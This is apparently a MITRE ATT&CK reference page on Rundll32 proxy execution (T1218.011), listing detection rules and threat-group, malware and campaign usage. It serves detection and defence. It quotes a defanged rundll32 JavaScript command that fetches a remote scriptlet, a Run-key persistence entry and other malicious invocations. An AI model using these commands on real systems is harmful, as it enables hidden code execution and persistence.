Rundll32

T1218.011

Sub-technique of T1218 System Binary Proxy Execution.View on attack.mitre.org

About this technique

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.

Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Detection rules49

Rules on DetectionCode tagged with T1218.011.

Sigma27

RuleLevelLog source
HackTool - F-Secure C3 Load by Rundll32criticalwindows / process_creation
Bad Opsec Defaults Sacrificial Processes With Improper Argumentshighwindows / process_creation
CobaltStrike Load by Rundll32highwindows / process_creation
HackTool - RedMimicry Winnti Playbook Executionhighwindows / process_creation
HTML Help HH.EXE Suspicious Child Processhighwindows / process_creation
Potential PowerShell Execution Via DLLhighwindows / process_creation
Process Access via TrolleyExpress Exclusionhighwindows / process_creation
RunDLL32 Spawning Explorerhighwindows / process_creation
Rundll32 UNC Path Executionhighwindows / process_creation
Shell32 DLL Execution in Suspicious Directoryhighwindows / process_creation
Suspicious Control Panel DLL Loadhighwindows / process_creation
Suspicious HH.EXE Executionhighwindows / process_creation
Suspicious Rundll32 Activity Invoking Sys Filehighwindows / process_creation
Suspicious Rundll32 Execution With Image Extensionhighwindows / process_creation
Suspicious ShellExec_RunDLL Call Via Ordinalhighwindows / process_creation

Splunk22

RuleTypeRiskData source
Detect Rundll32 Application Control Bypass - advpackTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Detect Rundll32 Application Control Bypass - setupapiTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Detect Rundll32 Application Control Bypass - syssetupTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
RunDLL Loading DLL By OrdinalTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Rundll32 Control RunDLL HuntHuntingNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Rundll32 Control RunDLL World Writable DirectoryTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Rundll32 DNSQueryTTPNULLSysmon EventID 22
Rundll32 LockWorkStationAnomalyNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Rundll32 Process Creating Exe Dll FilesTTPNULLSysmon EventID 11
Rundll32 with no Command Line Arguments with NetworkTTPNULLSysmon EventID 1 AND Sysmon EventID 3
Suspicious IcedID Rundll32 CmdlineTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious Rundll32 dllregisterserverTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious Rundll32 no Command Line ArgumentsTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious Rundll32 PluginInitTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious Rundll32 RenameHuntingNULLSysmon EventID 1

Groups26

Show 2 more

Software69

Show 45 more

Campaigns8

Procedure examples103

Groups26

Used byProcedure example
GroupAPT19

APT19 configured its payload to inject into the rundll32.exe.

GroupAPT28

APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.

GroupAPT3

APT3 has a tool that can run DLLs.

GroupAPT32

APT32 malware has used rundll32.exe to execute an initial infection process.

GroupAPT38

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.

GroupAPT41

APT41 has used rundll32.exe to execute a loader.

GroupAquatic Panda

Aquatic Panda used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary.

GroupBlue Mockingbird

Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.

View all 26 groups examples

Software69

Used byProcedure example
MalwareADVSTORESHELL

ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.

MalwareAttor

Attor's installer plugin can schedule rundll32.exe to load the dispatcher.

MalwareBackdoor.Oldrea

Backdoor.Oldrea can use rundll32 for execution on compromised hosts.

MalwareBad Rabbit

Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.

MalwareBisonal

Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.

MalwareBLINDINGCAN

BLINDINGCAN has used Rundll32 to load a malicious DLL.

MalwareBoomBox

BoomBox can use RunDLL32 for execution.

MalwareBriba

Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.

View all 69 software examples

Campaigns8

Used byProcedure example
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`.

CampaignC0015

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.

CampaignC0018

During C0018, the threat actors used `rundll32` to run Mimikatz.

CampaignC0021

During C0021, the threat actors used `rundll32.exe` to execute the Cobalt Strike Beacon loader DLL.

CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.

CampaignOperation Spalax

During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.

CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 used `Rundll32.exe` to execute payloads.

CampaignWater Curupira Pikabot Distribution

Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.

References7

  1. Attackify Rundll32.exe Obscurity Open source
    Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
  2. Github NoRunDll Open source
    gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.
  3. This is Security Command Line Confusion Open source
    B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
  4. Trend Micro CPL Open source
    Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
  5. lolbas project Ieframe.dll Open source
    lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025.
  6. lolbas project Zipfldr.dll Open source
    lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025.
  7. rundll32.exe defense evasion Open source
    Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.